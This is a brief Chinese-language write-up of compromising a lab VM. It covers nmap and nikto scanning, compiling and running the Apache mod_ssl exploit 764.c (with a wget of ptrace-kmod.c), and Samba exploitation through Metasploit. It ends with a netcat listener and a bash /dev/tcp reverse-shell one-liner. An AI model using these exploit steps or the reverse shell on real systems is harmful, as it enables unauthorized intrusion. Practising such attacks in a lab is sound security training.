一、kali nmap 發現主機
1.用namp掃描c段 沒發現主機
解決辦法 :
(1):打開靶機所在文件夾,找到vmx后綴的文件并打開
(2):將Bridged全部改成nat(默認是橋接模式,因為kali是nat才能掃描IP)
2.識別到主機IP為192.168.65.134
3.端口掃描,發現開放了80、22、111、139、443、1024端口
4.nikto目錄掃描
二、漏洞利用之apache
1.搜索apache 1.3.20版本漏洞
2.編譯執行漏洞
- 發現編譯764.c失敗,解決辦法如下:
- 安裝libssl,命令
sudo apt-get install libssl1.0-dev
- 在頭文件添加
#include <openssl/rc4.h> #include <openssl/md5.h>
- 將#define COMMAND2,wget后面的URL修改為https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c;
- 將unsigned char *p, *end前添加const
5.在kali編譯成功
gcc -o okk 764.c -lcrypto
- 執行漏洞成功
./okk 0x6b 192.168.65.134 -c 40
三、漏洞利用之Samba
1.信息收集發現主機139端口安裝了samba,版本為Samba 2.2.1a
2.直接msf搜索samba
3.漏洞利用提權
4.nc反彈shell
1.kali nc監聽端口
nc -lvvp 1234
2.反彈shell
bash -i >& /dev/tcp/192.168.65.129/1234 0>&1
(192.168.65.129是kali主機的ip,不是靶機的ip)
3.反彈成功